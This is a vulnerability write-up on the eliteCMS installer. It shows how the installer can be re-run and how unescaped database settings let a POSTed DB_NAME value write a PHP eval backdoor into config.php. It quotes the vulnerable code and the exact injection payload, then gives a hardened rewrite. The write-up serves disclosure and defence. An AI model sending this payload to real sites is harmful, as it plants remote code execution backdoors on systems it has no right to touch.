eliteCMS's installer is not locked once installation has finished, so an attacker can re-run the installation simply by visiting the installer URL.
A second vulnerability is that the installer can write a one-line backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated into PHP source with no escaping at all
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" . mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" . mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php as-is
    $writer = fopen($file, 'w');
    ...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
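As an added example (this is not eliteCMS's own code), here is how the same installer step could be written defensively: it refuses to run once an install lock exists, validates the submitted database settings, and emits them through var_export() so that a value like the one above ends up inside a string literal instead of terminating the PHP block. The file and function names (install.lock, validateDbSettings(), buildConfig(), writeConfig()) are assumptions for illustration, and the database-connection boilerplate from the original is left out.

```php
<?php
// Added example, not eliteCMS code. $lockFile, validateDbSettings(),
// buildConfig() and writeConfig() are illustrative names (assumptions).

// 1. Refuse to run the installer again once installation has completed.
//    The last install step creates this lock file; the web server user
//    should not be able to delete it afterwards.
$lockFile = __DIR__ . '/install.lock';
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installation is already complete. Remove install.lock manually to reinstall.');
}

// 2. Validate the submitted database settings before they are stored anywhere.
function validateDbSettings(array $post): array
{
    $settings = [];
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $settings[$key] = isset($post[$key]) ? (string) $post[$key] : '';
    }
    // Host names and database/user names have a narrow legitimate character
    // set; quotes, '<', '?' and newlines are rejected outright.
    if (!preg_match('/^[A-Za-z0-9._:-]{1,255}$/', $settings['DB_SERVER'])) {
        throw new InvalidArgumentException('Invalid DB_SERVER');
    }
    foreach (['DB_NAME', 'DB_USER'] as $key) {
        if (!preg_match('/^[A-Za-z0-9_$-]{1,64}$/', $settings[$key])) {
            throw new InvalidArgumentException("Invalid $key");
        }
    }
    // A password may legitimately contain any printable character, so it is
    // not pattern-checked; var_export() in buildConfig() makes it safe instead.
    return $settings;
}

// 3. Emit every value as a quoted, escaped PHP string literal. Because
//    var_export() escapes quotes and backslashes, a value such as
//    "?><?php ... ?><?php becomes part of the string constant and cannot
//    close the generated file's PHP block.
function buildConfig(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $key => $value) {
        $out .= sprintf("define(%s, %s);\n", var_export($key, true), var_export($value, true));
    }
    // No closing "?>" tag: any whitespace after it would be sent as output.
    return $out;
}

// 4. Write atomically so a half-written config never goes live.
function writeConfig(string $path, string $contents): void
{
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $contents, LOCK_EX) === false || !rename($tmp, $path)) {
        throw new RuntimeException('Could not write ' . $path);
    }
}

$settings = validateDbSettings($_POST);
writeConfig(__DIR__ . '/../admin/includes/config.php', buildConfig($settings));
touch($lockFile);
```

With this version the POST body from the write-up is rejected by the DB_NAME pattern before anything is written; even if the pattern were loosened, var_export() would emit it as `'"?><?php eval($_POST[c]);?><?php'`, a harmless string constant. The lock file closes the re-installation hole described at the start of the post, and a file-integrity check on admin/includes/config.php is a cheap way to detect an installer that has been re-run.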